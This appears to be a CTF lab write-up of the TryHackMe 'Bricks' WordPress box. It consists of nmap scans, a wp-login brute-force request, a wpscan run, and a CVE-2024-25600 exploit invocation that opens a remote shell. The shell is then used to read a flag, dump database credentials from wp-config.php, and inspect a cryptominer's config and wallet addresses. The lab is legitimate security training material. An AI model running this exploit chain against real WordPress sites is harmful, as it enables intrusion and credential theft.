Skip to content

root@ip-10-10-108-234:~# nmap -p1-1000 10.10.12.59

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-17 04:50 BST Nmap scan report for bricks.thm (10.10.12.59) Host is up (0.0058s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https MAC Address: 02:37:24:E8:D3:1F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-17 12:08 EDT Nmap scan report for bricks.thm (10.10.85.120) Host is up (0.20s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 f5:70:a3:e8:2c:a8:05:c0:90:c6:9b:24:13:06:4b:3c (RSA) | 256 d1:9c:ae:3e:09:6d:30:0e:86:5c:10:3c:42:2e:6f:c0 (ECDSA) | 256 a3:2c:b7:2a:07:9e:f3:75:4a:ba:65:76:b6:78:99:36 (ED25519) 80/tcp open http WebSockify Python/3.8.10 |_http-title: Error response |_http-server-header: WebSockify Python/3.8.10 | fingerprint-strings: | GetRequest: | HTTP/1.1 405 Method Not Allowed | Server: WebSockify Python/3.8.10 | Date: Wed, 17 Apr 2024 16:09:01 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 472 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | | | | Error response | | |

Error response

|

Error code: 405

|

Message: Method Not Allowed.

|

Error code explanation: 405 - Specified method is invalid for this resource.

| | | HTTPOptions: | HTTP/1.1 501 Unsupported method ('OPTIONS') | Server: WebSockify Python/3.8.10 | Date: Wed, 17 Apr 2024 16:09:01 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 500 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | | | | Error response | | |

Error response

|

Error code: 501

|

Message: Unsupported method ('OPTIONS').

|

Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.

| | 443/tcp open ssl/http Apache httpd | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US | Not valid before: 2024-04-02T11:59:14 |Not valid after: 2025-04-02T11:59:14 |_http-generator: WordPress 6.5 |_ssl-date: TLS randomness does not represent time |_http-title: Brick by Brick | tls-alpn: | h2 | http/1.1 |http-server-header: Apache | http-robots.txt: 1 disallowed entry |/wp-admin/ 3306/tcp open mysql MySQL (unauthorized) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.94SVN%I=7%D=4/17%Time=661FF41D%P=aarch64-unknown-linux-g SF:nu%r(GetRequest,291,"HTTP/1.1\x20405\x20Method\x20Not\x20Allowed\r\nSe SF:rver:\x20WebSockify\x20Python/3.8.10\r\nDate:\x20Wed,\x2017\x20Apr\x2 SF:02024\x2016:09:01\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20te SF:xt/html;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTM SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204.01//EN\"\n\x20\x20\x20\x20\x SF:20\x20\x20\x20\"http://www.w3.org/TR/html4/strict.dtd\">\n\n\x SF:20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x SF:20\x20\x20\x20\x20\x20Error\x20response\n\x20\x20\x20\x2 SF:0\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20

E SF:rror\x20response

\n\x20\x20\x20\x20\x20\x20\x20\x20

Error\x20code SF::\x20405

\n\x20\x20\x20\x20\x20\x20\x20\x20

Message:\x20Method\x20 SF:Not\x20Allowed.

\n\x20\x20\x20\x20\x20\x20\x20\x20

Error\x20code\ SF:x20explanation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20 SF:for\x20this\x20resource.

\n\x20\x20\x20\x20\n\n")%r(H SF:TTPOptions,2B9,"HTTP/1.1\x20501\x20Unsupported\x20method\x20\('OPTIONS SF:'\)\r\nServer:\x20WebSockify\x20Python/3.8.10\r\nDate:\x20Wed,\x2017\ SF:x20Apr\x202024\x2016:09:01\x20GMT\r\nConnection:\x20close\r\nContent-Ty SF:pe:\x20text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTY SF:PE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204.01//EN\"\n\x20\x20\ SF:x20\x20\x20\x20\x20\x20\"http://www.w3.org/TR/html4/strict.dtd\">\n< SF:html>\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\ SF:x20\x20\x20\x20\x20\x20\x20\x20Error\x20response\n\x20\x SF:20\x20\x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20 SF:\x20

Error\x20response

\n\x20\x20\x20\x20\x20\x20\x20\x20

Erro SF:r\x20code:\x20501

\n\x20\x20\x20\x20\x20\x20\x20\x20

Message:\x20U SF:nsupported\x20method\x20\('OPTIONS'\).

\n\x20\x20\x20\x20\x20\x20\x SF:20\x20

Error\x20code\x20explanation:\x20HTTPStatus.NOT_IMPLEMENTED\x SF:20-\x20Server\x20does\x20not\x20support\x20this\x20operation.

\n\x2 SF:0\x20\x20\x20\n\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 93.47 seconds

POST /wp-login.php HTTP/2 Host: bricks.thm Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://bricks.thm/wp-login.php?redirect_to=https%3A%2F%2F10.10.85.120%2Fwp-admin%2F&reauth=1 Content-Type: application/x-www-form-urlencoded Content-Length: 102 Origin: https://bricks.thm Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers

log=§admin§&pwd=password&wp-submit=Log+In&redirect_to=https%3A%2F%2F10.10.85.120%2Fwp-admin%2F&testcookie=1

Result: Error: The password you entered for the username administrator is incorrect.

wpscan --url https://bricks.thm/ --disable-tls-checks

[+] WordPress theme in use: bricks | Location: https://bricks.thm/wp-content/themes/bricks/ | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css | Style Name: Bricks | Style URI: https://bricksbuilder.io/ | Description: Visual website builder for WordPress.... | Author: Bricks | Author URI: https://bricksbuilder.io/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | Version: 1.9.5 (80% confidence) | Found By: Style (Passive Detection) | - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'

┌──(root㉿kali)-[/home/kali/CVE-2024-25600-EXPLOIT] └─# python3 CVE-2024-25600.py -u https://10.10.148.55

_ _ ___ ____ ___ __ __ ___ ___________ ____ ____ / ____/ | / / ____/ |__ \ / __ _ \/ // / | \ / ____/ ___// __ \/ __ \ / / | | / / __/________/ // / / // / // /______/ // \/ __ \/ / / / / / / / / | |/ / //_____/ __// // / / // /____/ / // / // / // / _/ |// /____/____/____/ // /_/_/__/_/_/

Coded By: K3ysTr0K3R --> Hello, Friend!

[] Checking if the target is vulnerable [+] The target is vulnerable [] Initiating exploit against: https://10.10.148.55 [*] Initiating interactive shell [+] Interactive shell opened successfully Shell> ls 650c844110baced87e1606453b93f22a.txt index.php kod license.txt phpmyadmin readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php

Shell> cat 650c844110baced87e1606453b93f22a.txt THM{fl46_650c844110baced87e1606453b93f22a}

Shell> systemctl cat ubuntu.service

/etc/systemd/system/ubuntu.service

[Unit] Description=TRYHACK3M

[Service] Type=simple ExecStart=/lib/NetworkManager/nm-inet-dialog Restart=on-failure

[Install] WantedBy=multi-user.target

cat wp-config.php

/* Database username / define( 'DB_USER', 'root' );

/* Database password / define( 'DB_PASSWORD', 'lamp.sh' );

Shell> head /lib/NetworkManager/inet.conf ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

rm kod/data/system/install.lock

admin password

bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r

Ivan Gennadievich Kondratiev

LockBit Ransomware Group